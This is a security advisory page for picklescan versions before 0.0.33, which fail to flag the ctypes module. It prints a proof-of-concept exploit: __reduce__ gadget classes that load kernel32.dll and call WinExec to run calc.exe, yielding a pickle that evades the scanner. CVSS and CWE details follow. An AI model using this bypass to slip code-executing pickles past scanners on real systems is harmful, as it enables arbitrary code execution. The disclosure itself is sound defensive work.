Picklescan does not block ctypes

Description

Summary

Picklescan doesnt flag ctypes module as a dangerous module, which is a huge issue. ctypes is basically a foreign function interface library and can be used to
* Load DLLs
* Call C functions directly
* Manipulate memory raw pointers.

This can allow attackers to achieve RCE by invoking direct syscalls without going through blocked modules. Another major issue that ctypes being allowed presents is that it can be used down the line to dismantle interpreter based python sandboxes as ctypes allow direct access to raw memory.

This is a more severe loophole than normal gadget chains and bypasses as raw memory access can be used for a lot of nefarious purposes down the line if left undetected

PoC

import pickle
import ctypes
import operator

class Kernel32Loader:
    def __reduce__(self):
        #we go direct to the kerneeellllllll
        return (ctypes.WinDLL, ("kernel32.dll",))

class WinExecGetter:
    def __reduce__(self):
        return (operator.itemgetter("WinExec"), (Kernel32Loader(),))

class PopCalc:
    def __reduce__(self):
        #methodcaller to invoke "__call__" on the function pointer.
        return (
            operator.methodcaller("__call__", b"calc.exe", 1), 
            (WinExecGetter(),)
        )

try:
    payload = pickle.dumps(PopCalc())

    with open("calc_exploit.pkl", "wb") as f:
        f.write(payload)

    print("Generated 'calc_exploit.pkl'")

except Exception as e:
    print(f"Generation failed: {e}")

This will create a pickle file which is not detected by the latest version of picklescan as malicious

import pickle
print("Loading bypass.pkl...")
pickle.load(open("calc_exploit.pkl", "rb"))

<img width="1333" height="677" alt="image" src="https://github.com/user-attachments/assets/f5b066f3-116a-4377-a538-f293f3a6c176" />

Basic information

Type
reviewed
Severity
high
Advisory on GitHub
Open advisory ↗
Repository advisory
Open repository advisory ↗
Source code
Browse source ↗
Published (advisory)
2025-12-29 15:23:49 UTC
Updated
2026-06-18 14:44:58 UTC
GitHub reviewed
2025-12-29 15:23:49 UTC

EPSS Score

Score Percentile
0.76% 50.34%

CVSS Scores

Base score Version Severity Vector
9.8 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:L)
Once they can reach the bug, pulling it off is straightforward—no weird race conditions or rare setup.
Privileges required (PR:N)
No account or special rights needed—anonymous or random user is enough.
User interaction (UI:N)
Nobody has to click “OK” or open a trap file; it can work without a victim helping.
Scope (S:U)
Damage stays in the same “trust bubble” as the broken component—no big spill into unrelated systems.
Confidentiality (C:H)
Serious risk that confidential data gets exposed in a big way.
Integrity (I:H)
They could widely tamper with or forge data—trust in the data is badly hurt.
Availability (A:H)
Could take the service down hard or make it unusable for people who depend on it.
8.9 4.0
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network.
Attack complexity (AC:L)
Exploitation conditions are straightforward and stable.
Attack requirements (AT:N)
No additional preconditions are required beyond normal reachability.
Privileges required (PR:N)
No privileges are required.
User interaction (UI:N)
No user interaction is required.
Vulnerable system confidentiality impact (VC:H)
High confidentiality impact on the vulnerable system.
Vulnerable system integrity impact (VI:H)
High integrity impact on the vulnerable system.
Vulnerable system availability impact (VA:H)
High availability impact on the vulnerable system.
Subsequent system confidentiality impact (SC:N)
No confidentiality impact on subsequent systems.
Subsequent system integrity impact (SI:N)
No integrity impact on subsequent systems.
Subsequent system availability impact (SA:N)
No availability impact on subsequent systems.
Exploit maturity (threat) (E:P)
Proof-of-concept: public PoC exists; no reported exploitation and no known simplification tools.

Identifiers

CWEs

CWE id Name
CWE-184 Incomplete List of Disallowed Inputs
CWE-913 Improper Control of Dynamically-Managed Code Resources

Credits

  • 0x-Apollyon (reporter)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
pip picklescan < 0.0.33 0.0.33

References

cvelogic Threat Intelligence